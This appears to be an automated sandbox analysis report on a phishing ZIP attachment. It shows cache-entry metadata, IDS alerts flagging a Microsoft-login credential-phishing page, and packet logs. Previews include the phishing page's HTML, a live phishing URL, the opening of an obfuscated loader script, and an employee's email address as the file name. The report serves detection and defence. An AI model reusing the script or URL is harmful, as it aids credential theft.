                                                                                                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                                                                                                              Chrome Cache Entry: 83

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:HTML document, ASCII text
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):366
                                                                                                              Entropy (8bit):5.561239232703452
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:5mWxuJGzxVjyLOX66CiwAGfOVZA+WLShJTIP5TNm5dSUmxDeY4NhdA1BYXXfbwYj:4WYcVVjyKq6CDAWOvfWLSsPZ45dWDd43
                                                                                                              MD5:655F019EF7815E2A9FAC61C5DD982C95
                                                                                                              SHA1:78501456002366FFE606ED51C23AF8B1CEC79920
                                                                                                              SHA-256:0400CBCFC2A7761617EC478D0B7000381C734E448345757B68E622089C1418BA
                                                                                                              SHA-512:ACBDF9BB337EEDA98CE2D6FBE69F24E279446DBB5AD555E853409D1AF2D491B8BBDE76D1F4C61F9C8D01DBDB377543AE98EF0C38EF42B83E509D5868A664E38B
                                                                                                              Malicious:false
                                                                                                              URL:https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=
                                                                                                              Preview:.<!DOCTYPE html>.<html id='html' sti='VlZORlVqRTFNRGt5TURJMFZURXdNRGt4TlRFdw==' vic='' lang='en'>..<head>. <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' crossorigin='anonymous'></script>.</head>..<body id='allbody'>..</body>..<script src='jsnom.js'></script>.</html>

                                                                                                              Chrome Cache Entry: 84

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):2407
                                                                                                              Entropy (8bit):7.900400471609788
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                                                                              MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                                                                              SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                                                                              SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                                                                              SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                                                                              Malicious:false
                                                                                                              URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                                                                              Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

                                                                                                              Chrome Cache Entry: 85

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):100221
                                                                                                              Entropy (8bit):4.5172483519347795
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAC:ix2wtA4+eS6e6+XE3TLJCLIlAC
                                                                                                              MD5:36347E6D3871E020ACDFB30E3F4E34F6
                                                                                                              SHA1:DEA3861A340710939E2BC90C5256543E873B2158
                                                                                                              SHA-256:EA8FC4058EE8385E9B530DAC5A985D72ECFB9DC570F80410052D1EE24BD73205
                                                                                                              SHA-512:2A60C0B4555B3B2CC4919C4D358F8DDD68D77402EB26A73A6119F2DD39165443AE5EC176C4C1962E683E0F064E059FA51682F01E6E2F5F0AD2BF82E329D54E7C
                                                                                                              Malicious:false
                                                                                                              URL:https://marty-n.com/o/jsnom.js
                                                                                                              Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151

                                                                                                              Chrome Cache Entry: 86

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2228
                                                                                                              Entropy (8bit):7.82817506159911
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                              MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                              SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                              SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                              SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                              Malicious:false
                                                                                                              Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.

                                                                                                              Chrome Cache Entry: 87

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):276
                                                                                                              Entropy (8bit):7.316609873335077
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
                                                                                                              MD5:4E3510919D29D18EEB6E3E8B2687D2F5
                                                                                                              SHA1:31522A9EC576A462C3F1FFA65C010D4EB77E9A85
                                                                                                              SHA-256:1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
                                                                                                              SHA-512:DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
                                                                                                              Malicious:false
                                                                                                              URL:https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
                                                                                                              Preview:...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....*e.......J).*8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

                                                                                                              Chrome Cache Entry: 88

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):1636
                                                                                                              Entropy (8bit):4.214613323368661
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                                                                              MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                                                                              SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                                                                              SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                                                                              SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                                                                              Malicious:false
                                                                                                              URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21

                                                                                                              Chrome Cache Entry: 89

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):23427
                                                                                                              Entropy (8bit):5.112735417225198
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                                                                              MD5:BA0537E9574725096AF97C27D7E54F76
                                                                                                              SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                                                                              SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                                                                              SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                                                                              Malicious:false
                                                                                                              URL:https://www.w3schools.com/w3css/4/w3.css
                                                                                                              Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p

                                                                                                              Chrome Cache Entry: 90

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64593)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):100221
                                                                                                              Entropy (8bit):4.5172483519347795
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:ib8J+apQ3jx2wtA4+eS6e6+mitQT3TLJCLaRlAC:ix2wtA4+eS6e6+XE3TLJCLIlAC
                                                                                                              MD5:36347E6D3871E020ACDFB30E3F4E34F6
                                                                                                              SHA1:DEA3861A340710939E2BC90C5256543E873B2158
                                                                                                              SHA-256:EA8FC4058EE8385E9B530DAC5A985D72ECFB9DC570F80410052D1EE24BD73205
                                                                                                              SHA-512:2A60C0B4555B3B2CC4919C4D358F8DDD68D77402EB26A73A6119F2DD39165443AE5EC176C4C1962E683E0F064E059FA51682F01E6E2F5F0AD2BF82E329D54E7C
                                                                                                              Malicious:false
                                                                                                              Preview:function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3ed08f, _0x56c8b3) {. const _0x2019c0 = _0x1fae,. _0x43cc63 = _0x3ed08f();. while (!![]) {. try {. const _0x262285 = parseInt(_0x2019c0(0x121)) / 0x1 + -parseInt(_0x2019c0(0x170)) / 0x2 + -parseInt(_0x2019c0(0x14b)) / 0x3 + -parseInt(_0x2019c0(0x14d)) / 0x4 + -parseInt(_0x2019c0(0x14c)) / 0x5 + -parseInt(_0x2019c0(0x118)) / 0x6 + parseInt(_0x2019c0(0x171)) / 0x7;. if (_0x262285 === _0x56c8b3) break;. else _0x43cc63['push'](_0x43cc63['shift']());. } catch (_0x3070ea) { _0x43cc63['push'](_0x43cc63['shift']()); }. }.}(_0x59eb, 0x27508), window['addEventListener']('load', function() {. const _0x1706f4 = _0x1fae;. document[_0x1706f4(0x166)][_0x1706f4(0x102)](_0x1706f4(0x151

                                                                                                              Chrome Cache Entry: 91

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                              Category:dropped
                                                                                                              Size (bytes):673
                                                                                                              Entropy (8bit):7.6596900876595075
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                              MD5:0E176276362B94279A4492511BFCBD98
                                                                                                              SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                              SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                              SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                              Malicious:false
                                                                                                              Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                                                                                              Chrome Cache Entry: 92

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:ASCII text, with very long lines (49854)
                                                                                                              Category:downloaded
                                                                                                              Size (bytes):49993
                                                                                                              Entropy (8bit):5.216475744251136
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                                                                              MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                                                                              SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                                                                              SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                                                                              SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                                                                              Malicious:false
                                                                                                              URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                                                                              Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                              Entropy (8bit):7.963100340785422
                                                                                                              TrID:
                                                                                                              • ZIP compressed archive (8000/1) 100.00%
                                                                                                              File name:Rob.Kuster@stonhard.com.zip
                                                                                                              File size:40'716 bytes
                                                                                                              MD5:d3399bfa41bf597bc09c1937d775e685
                                                                                                              SHA1:69606947338e9c0c5090e4b0b8b84a03b9d6e67f
                                                                                                              SHA256:5365a73cc664ffa93fa4f308c69b4f3f5961a9cb253186faef681f74ef104f7f
                                                                                                              SHA512:08105c5f4297ad4f2c847866a3e9af67fb063ea66efab904b837d26c7ef2fe96ad6ff9f35d7a1506c716d7d3758e3635915d0f4c9528c3fa03470452daff83ff
                                                                                                              SSDEEP:768:HQCjgBbE+IP1Vvsch3XdO3k0f6WGqfAxVxCNW+FQHqgV4UHDXE1mUgkA6TplEp8w:wCjgB1IPkCHd/HWLIHwNyqULz6m36Mh
                                                                                                              TLSH:9303F11549612B65F47DEC7D1A8306638CD4822F6ECD023940ED20BE4FE13275AAF9BB
                                                                                                              File Content Preview:PK..........CY....lN......]...Rob.Kuster@stonhard.com (Primary)\Recoverable Items\Purges\ACH Released 10%2F2%2F2024 Ref.msg.}.`cGy...k..l..}X.\....aI>.kK..cm...3.....%.+..#.l ..-Ph.r..P.6....R.r.#.Ji.M(............7.f.d[..&..o..i......o........g......uOh.

                                                                                                              File Icon

                                                                                                              Icon Hash:1c1c1e4e4ececedc

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-10-25T22:23:31.945805+02002056643ET PHISHING Javascript Browser Fingerprinting POST Request2192.168.2.1649735185.45.66.155443TCP
                                                                                                              2024-10-25T22:23:33.475978+02002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.1649738185.45.66.155443TCP
                                                                                                              2024-10-25T22:23:35.620357+02002056316ET PHISHING Generic Credential Phish Landing Page (jsnom.js)1192.168.2.1649740185.45.66.155443TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 25, 2024 22:21:33.894453049 CEST49673443192.168.2.16204.79.197.203
                                                                                                              Oct 25, 2024 22:21:34.197709084 CEST49673443192.168.2.16204.79.197.203
                                                                                                              Oct 25, 2024 22:21:34.804699898 CEST49673443192.168.2.16204.79.197.203
                                                                                                              Oct 25, 2024 22:21:36.012722969 CEST49673443192.168.2.16204.79.197.203
                                                                                                              Oct 25, 2024 22:21:36.909538031 CEST4968980192.168.2.16192.229.211.108
                                                                                                              Oct 25, 2024 22:21:38.422739029 CEST49673443192.168.2.16204.79.197.203
                                                                                                              Oct 25, 2024 22:21:40.379239082 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:40.379297018 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:40.379379034 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:40.381782055 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:40.381798029 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.238641024 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.238744974 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.243432999 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.243453979 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.243840933 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.291728020 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.301963091 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.343372107 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.553412914 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.553507090 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.553584099 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.553750992 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.553770065 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.553785086 CEST49700443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.553790092 CEST44349700184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.599133015 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.599175930 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:41.599503040 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.599832058 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:41.599848986 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.056196928 CEST49678443192.168.2.1620.189.173.10
                                                                                                              Oct 25, 2024 22:21:42.357731104 CEST49678443192.168.2.1620.189.173.10
                                                                                                              Oct 25, 2024 22:21:42.487122059 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.487195015 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:42.490708113 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:42.490720034 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.491123915 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.493654966 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:42.535343885 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.736722946 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.736898899 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.737013102 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:42.748303890 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:42.748330116 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.748342037 CEST49701443192.168.2.16184.28.90.27
                                                                                                              Oct 25, 2024 22:21:42.748348951 CEST44349701184.28.90.27192.168.2.16
                                                                                                              Oct 25, 2024 22:21:42.971810102 CEST49678443192.168.2.1620.189.173.10
                                                                                                              Oct 25, 2024 22:21:43.237734079 CEST49673443192.168.2.16204.79.197.203
                                                                                                              Oct 25, 2024 22:21:44.184737921 CEST49678443192.168.2.1620.189.173.10
                                                                                                              Oct 25, 2024 22:21:44.777489901 CEST49703443192.168.2.1620.12.23.50
                                                                                                              Oct 25, 2024 22:21:44.777537107 CEST4434970320.12.23.50192.168.2.16
                                                                                                              Oct 25, 2024 22:21:44.777612925 CEST49703443192.168.2.1620.12.23.50
                                                                                                              Oct 25, 2024 22:21:44.778693914 CEST49703443192.168.2.1620.12.23.50
                                                                                                              Oct 25, 2024 22:21:44.778708935 CEST4434970320.12.23.50192.168.2.16
                                                                                                              Oct 25, 2024 22:21:45.645498991 CEST4434970320.12.23.50192.168.2.16
                                                                                                              Oct 25, 2024 22:21:45.645571947 CEST49703443192.168.2.1620.12.23.50
                                                                                                              Oct 25, 2024 22:21:45.647133112 CEST49703443192.168.2.1620.12.23.50
                                                                                                              Oct 25, 2024 22:21:45.647142887 CEST4434970320.12.23.50192.168.2.16
                                                                                                              Oct 25, 2024 22:21:45.647465944 CEST4434970320.12.23.50192.168.2.16
                                                                                                              Oct 25, 2024 22:21:45.691730022 CEST49703443192.168.2.1620.12.23.50
